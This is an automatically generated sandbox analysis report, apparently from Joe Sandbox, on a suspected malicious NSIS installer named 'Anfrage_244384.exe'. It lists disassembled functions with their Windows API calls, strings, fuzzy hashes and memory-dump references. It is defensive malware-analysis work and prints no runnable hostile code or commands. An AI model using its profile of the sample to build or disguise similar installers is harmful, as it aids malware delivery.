API String ID: 2531174081-0
Opcode ID: 3b2410e8308c6412343eb032780aba43e390b926bae686ddbb8ef07075a9bc68
Instruction ID: 94b0b073a5ce97ddacba51ea26bc878ee4e16423412cd9a98c67571b7997b3ab
Opcode Fuzzy Hash: 3b2410e8308c6412343eb032780aba43e390b926bae686ddbb8ef07075a9bc68
Instruction Fuzzy Hash: D5219D71900518BBDF119FA5CD84ADFBFA9EF04354F14807AF944B6291C6398E40CFA8

Function 004048A7 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 004048C2
GetMessagePos.USER32 ref: 004048CA
ScreenToClient.USER32(?,?), ref: 004048E4
SendMessageA.USER32(?,00001111,00000000,?), ref: 004048F6
SendMessageA.USER32(?,0000110C,00000000,?), ref: 0040491C

Strings

f, xrefs: 004048F8

Memory Dump Source

Source File: 00000000.00000002.2596449027.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2596432455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596476754.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596600398.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Anfrage_244384.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 33c806690141bddee9d4868c528a06b643bfd418e36cfd9cd505f5ef0f9636f7
Instruction ID: b60015b5b4e1efc5408348c5136693cdb789d2fb79533d825e55e5a5312c0c55
Opcode Fuzzy Hash: 33c806690141bddee9d4868c528a06b643bfd418e36cfd9cd505f5ef0f9636f7
Instruction Fuzzy Hash: CE015EB590021DBAEB00DBA4DD85BFFBBBCAF55711F10412BBA50B61C0C7B499018BA4

Function 00401D95 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401D98
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DB2
MulDiv.KERNEL32(00000000,00000000), ref: 00401DBA
ReleaseDC.USER32(?,00000000), ref: 00401DCB
CreateFontIndirectA.GDI32(0040B818), ref: 00401E1A

Strings

Tahoma, xrefs: 00401E00

Memory Dump Source

Source File: 00000000.00000002.2596449027.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2596432455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596476754.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596600398.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Anfrage_244384.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID: Tahoma
API String ID: 3808545654-3580928618
Opcode ID: 4a9721664201bd5593a8fcbda807d16f2860009d8a73813414fafdd84ed437a3
Instruction ID: 1358c95a7d37f972e16a3fa2afb190f01721c65bbfaef5fc63903db35bf40af4
Opcode Fuzzy Hash: 4a9721664201bd5593a8fcbda807d16f2860009d8a73813414fafdd84ed437a3
Instruction Fuzzy Hash: DD015272544240AFE7006B74AE4A7A93FF8DB59315F10843AF141B62F2CB7900458FAD

Function 00402C13 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C2E
MulDiv.KERNEL32(0012CA0E,00000064,0012EEF8), ref: 00402C59
wsprintfA.USER32 ref: 00402C69
SetWindowTextA.USER32(?,?), ref: 00402C79
SetDlgItemTextA.USER32(?,00000406,?), ref: 00402C8B

Strings

verifying installer: %d%%, xrefs: 00402C63

Memory Dump Source

Source File: 00000000.00000002.2596449027.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2596432455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596476754.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596600398.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Anfrage_244384.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: bfb410b3b6209971c20e4d2875b6fc85698dfbb326aa5bfda2d4b594da7e2ec0
Instruction ID: 7317fb9631212961ca73b33fff5b89fd9836da26efc2a3b2e30b0290716cf4a9
Opcode Fuzzy Hash: bfb410b3b6209971c20e4d2875b6fc85698dfbb326aa5bfda2d4b594da7e2ec0
Instruction Fuzzy Hash: 0E01627060020CFBEF209F60DE09EEE37A9EB04304F008039FA06A51D0DBB899518F58

Function 00402749 Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040279D
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 004027B9
GlobalFree.KERNEL32(?), ref: 004027F2
GlobalFree.KERNEL32(00000000), ref: 00402805
CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 0040281D
DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402831

Memory Dump Source

Source File: 00000000.00000002.2596449027.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2596432455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596476754.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596600398.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Anfrage_244384.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: 45c976d1f9efa3b673be8bfb29733d3aa1598ede0f13eddfd8cf1085deaf7a0d
Instruction ID: 571a6d001cc63de597daa7fe39824babb5321d0f4a9ee8e37ed24c69abe451e8
Opcode Fuzzy Hash: 45c976d1f9efa3b673be8bfb29733d3aa1598ede0f13eddfd8cf1085deaf7a0d
Instruction Fuzzy Hash: 62219C71800128BBCF217FA5CE89D9E7A79EF09324F14423AF551762E1CA794941DFA8

Function 1000180D Relevance: 7.7, APIs: 5, Instructions: 189COMMON

Download Yara Rule

APIs

GlobalFree.KERNEL32(?), ref: 10001869
GlobalFree.KERNEL32(?), ref: 100019EF
GlobalFree.KERNEL32(?), ref: 100019F4

Memory Dump Source

Source File: 00000000.00000002.2608477836.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.2608425248.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2608498578.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2608545228.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_Anfrage_244384.jbxd

Similarity

API ID: FreeGlobal
String ID:
API String ID: 2979337801-0
Opcode ID: 83a27a6a764e204457f331ddef67b06d43c1ca0f526d792f63dc3af4834dec0e
Instruction ID: adaf369aa6dab84e94bee76403d526b7d43184adb12fe210256c1aedb67fe499
Opcode Fuzzy Hash: 83a27a6a764e204457f331ddef67b06d43c1ca0f526d792f63dc3af4834dec0e
Instruction Fuzzy Hash: 43512536D04159AEFB55DFB488A4AEEBBF6EF453C0F124169E841B315DCA306E4087D2

Function 00401D3B Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?), ref: 00401D3F
GetClientRect.USER32(00000000,?), ref: 00401D4C
LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401D6D
SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D7B
DeleteObject.GDI32(00000000), ref: 00401D8A

Memory Dump Source

Source File: 00000000.00000002.2596449027.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2596432455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596476754.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596600398.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Anfrage_244384.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: b9866fc206b3e1f2001e4087a8a8d6ef2e3fb8e7fd47bad3a68fd0200ce6cc51
Instruction ID: 59b50efb9a894631b7e7ef6fc31e4c4877b28631b56f020e773a3ce1da8bb2e7
Opcode Fuzzy Hash: b9866fc206b3e1f2001e4087a8a8d6ef2e3fb8e7fd47bad3a68fd0200ce6cc51
Instruction Fuzzy Hash: 6EF0FFB2600519BFD700EBA4DF88DAFB7BCEB44301B10447AF641F2191CA749D018B38

Function 00401C04 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C74
SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C8C

Strings

!, xrefs: 00401C40

Memory Dump Source

Source File: 00000000.00000002.2596449027.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2596432455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596476754.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596600398.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Anfrage_244384.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 028af5dbbf2e27154293e1be7a1693a126019fa8c38554a83be992bc88fc6b23
Instruction ID: c229e225b91697c78ff11bbf30ef832f008d48f992f947ceaaf7a44b37239d7f
Opcode Fuzzy Hash: 028af5dbbf2e27154293e1be7a1693a126019fa8c38554a83be992bc88fc6b23
Instruction Fuzzy Hash: E921A271A44208BEEB15EFA4DA46AED7FB1EF84314F24403EF101B61D1DA788640DB28

Function 0040479D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(0042A868,0042A868,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004046B8,000000DF,00000000,00000400,?), ref: 0040483B
wsprintfA.USER32 ref: 00404843
SetDlgItemTextA.USER32(?,0042A868), ref: 00404856

Strings

%u.%u%s%s, xrefs: 00404825

Memory Dump Source

Source File: 00000000.00000002.2596449027.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2596432455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596476754.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596600398.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Anfrage_244384.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: 87a759055d291fd877383144180c8e5bed6145313cb5bdff1d542eccde70147e
Instruction ID: 1726a7b3b84a2b44988fbd512cc110d638b221a6b4b1acd42f263589eafed974
Opcode Fuzzy Hash: 87a759055d291fd877383144180c8e5bed6145313cb5bdff1d542eccde70147e
Instruction Fuzzy Hash: D611E4736041282BEB00666D9C45EEF3698DB86374F244237FA25F31D1EA78CC1286E8

Function 00403A08 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 71COMMON

Download Yara Rule

APIs

SetWindowTextA.USER32(00000000,Debutromaners241 Setup), ref: 00403AA0

Strings

"C:\Users\user\Desktop\Anfrage_244384.exe", xrefs: 00403A09
1033, xrefs: 00403A0C, 00403A16, 00403A87
Debutromaners241 Setup, xrefs: 00403A8F

Memory Dump Source

Source File: 00000000.00000002.2596449027.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2596432455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596476754.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596600398.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Anfrage_244384.jbxd

Similarity

API ID: TextWindow
String ID: "C:\Users\user\Desktop\Anfrage_244384.exe"$1033$Debutromaners241 Setup
API String ID: 530164218-111073483
Opcode ID: 96401226afcf46c978deea678981fff0f7e57d07aa73fd903f01d42c88786375
Instruction ID: b04f25c42bae21d45f40ba66b929719106617fb277c5c9e4054ff8f425243e64
Opcode Fuzzy Hash: 96401226afcf46c978deea678981fff0f7e57d07aa73fd903f01d42c88786375
Instruction Fuzzy Hash: 1811A431B005109BC720EF55DC8097777ACEF94759758813BE841A7391D6399D038E68

Function 00405835 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403190,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403393), ref: 0040583B
CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403190,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403393), ref: 00405844
lstrcatA.KERNEL32(?,0040A014), ref: 00405855

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405835

Memory Dump Source

Source File: 00000000.00000002.2596449027.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2596432455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596476754.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596600398.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Anfrage_244384.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-3936084776
Opcode ID: 178b6ada5e076015f485ca613ecf1787b7cf1381da79526f7687ddfe4de49248
Instruction ID: 43d0cd13a6a684b33c4c302d476afec45ae212270d2ea225269fd4ac386bbf9e
Opcode Fuzzy Hash: 178b6ada5e076015f485ca613ecf1787b7cf1381da79526f7687ddfe4de49248
Instruction Fuzzy Hash: 46D0A9A2201A302AE20237158C09ECB2A08CF12316B04803BF202B21A1CA7D0D428BFE

Function 00402C96 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000,00402E76,00000001), ref: 00402CA9
GetTickCount.KERNEL32 ref: 00402CC7
CreateDialogParamA.USER32(0000006F,00000000,00402C13,00000000), ref: 00402CE4
ShowWindow.USER32(00000000,00000005), ref: 00402CF2

Memory Dump Source

Source File: 00000000.00000002.2596449027.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2596432455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596476754.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596600398.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Anfrage_244384.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 7c95322a2218cd30271dcbbb025a48105d342dcc5512f67fa7608e428122dd6b
Instruction ID: 83d2969b76bdb5b590415ddeb9dbf6a67b394939c3bc7fdf3e8ca1fe09a6ce6e
Opcode Fuzzy Hash: 7c95322a2218cd30271dcbbb025a48105d342dcc5512f67fa7608e428122dd6b
Instruction Fuzzy Hash: 4CF05E31605620ABD6217B20FF0C99F7BA4B714B45B81057EF045B21F8CB7818868B9C

Function 00405923 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00405DC3: lstrcpynA.KERNEL32(?,?,00000400,00403251,Debutromaners241 Setup,NSIS Error), ref: 00405DD0

Part of subcall function 004058CE: CharNextA.USER32(?,?,0042BC70,?,0040593A,0042BC70,0042BC70,76233410,?,C:\Users\user\AppData\Local\Temp\,00405685,?,76233410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058DC
Part of subcall function 004058CE: CharNextA.USER32(00000000), ref: 004058E1
Part of subcall function 004058CE: CharNextA.USER32(00000000), ref: 004058F5

lstrlenA.KERNEL32(0042BC70,00000000,0042BC70,0042BC70,76233410,?,C:\Users\user\AppData\Local\Temp\,00405685,?,76233410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405976
GetFileAttributesA.KERNEL32(0042BC70,0042BC70,0042BC70,0042BC70,0042BC70,0042BC70,00000000,0042BC70,0042BC70,76233410,?,C:\Users\user\AppData\Local\Temp\,00405685,?,76233410,C:\Users\user\AppData\Local\Temp\), ref: 00405986

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405923

Memory Dump Source

Source File: 00000000.00000002.2596449027.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2596432455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596476754.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596600398.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Anfrage_244384.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 3248276644-3936084776
Opcode ID: 2dd11022cd3804a0f23826d58d53fd3ba18c85e64f763ac6aee612c12e1a2a27
Instruction ID: 92543aceb9d73041788eed49261eabef0250a74612a1112b20cd45f7194ba1aa
Opcode Fuzzy Hash: 2dd11022cd3804a0f23826d58d53fd3ba18c85e64f763ac6aee612c12e1a2a27
Instruction Fuzzy Hash: 2FF0F466104E51A2C222333A1C09E9F0A18CE43374719453FFCA1B62C2DB3C8D569DBE

Function 004036AE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,76233410,00000000,C:\Users\user\AppData\Local\Temp\,00403686,004034A0,?), ref: 004036C8
GlobalFree.KERNEL32(0075E8D0), ref: 004036CF

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004036AE

Memory Dump Source

Source File: 00000000.00000002.2596449027.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2596432455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596476754.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596600398.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Anfrage_244384.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-3936084776
Opcode ID: 1bad914f96c97a74accc372815b9fc60e9a0461e25a509c21ecbd9517d8462b1
Instruction ID: 9fca1652fb000c4b705c35b2fab9dc87deb0b29542395ee28e6d3d9d92831ef3
Opcode Fuzzy Hash: 1bad914f96c97a74accc372815b9fc60e9a0461e25a509c21ecbd9517d8462b1
Instruction Fuzzy Hash: B8E08C32A2102067CA312F54EE0472A7BAC6F49B22F09046AE9807B3608B755C424BCC

Function 0040587C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402D66,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Anfrage_244384.exe,C:\Users\user\Desktop\Anfrage_244384.exe,80000000,00000003), ref: 00405882
CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402D66,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Anfrage_244384.exe,C:\Users\user\Desktop\Anfrage_244384.exe,80000000,00000003), ref: 00405890

Strings

C:\Users\user\Desktop, xrefs: 0040587C

Memory Dump Source

Source File: 00000000.00000002.2596449027.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2596432455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596476754.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596600398.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Anfrage_244384.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-3125694417
Opcode ID: a9e0b15de56eef468385f8c6f647f59dc691c576a1137d19596c50b040f8bf1b
Instruction ID: 2ed5ef101b5713daa1f548366255804a524b1aabb415f21906ff2d2d9e5555c3
Opcode Fuzzy Hash: a9e0b15de56eef468385f8c6f647f59dc691c576a1137d19596c50b040f8bf1b
Instruction Fuzzy Hash: C3D0A763408D701EF30363108C04B9F7A48DF12300F0940B2E481A2190C6BC0C424BBD

Function 100010E0 Relevance: 5.1, APIs: 4, Instructions: 102memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?), ref: 1000115B
GlobalFree.KERNEL32(00000000), ref: 100011B4
GlobalFree.KERNEL32(?), ref: 100011C7
GlobalFree.KERNEL32(?), ref: 100011F5

Memory Dump Source

Source File: 00000000.00000002.2608477836.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.2608425248.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2608498578.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2608545228.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_Anfrage_244384.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: 6ef9e3687ab983c99c874163fdcc0ee6cc2800f994ca68b8431a209e6fec97f5
Instruction ID: 5d3a3765e571093bf703368c32e31ec5bfeafbef09712c331e02e9e13643e521
Opcode Fuzzy Hash: 6ef9e3687ab983c99c874163fdcc0ee6cc2800f994ca68b8431a209e6fec97f5
Instruction Fuzzy Hash: 6531ABB1808255AFF715CFA8DC89AEA7FE8EB052C1B164115FA45D726CDB34D910CB24

Function 0040599B Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405BF8,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004059AB
lstrcmpiA.KERNEL32(00000000,00000000), ref: 004059C3
CharNextA.USER32(00000000,?,00000000,00405BF8,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004059D4
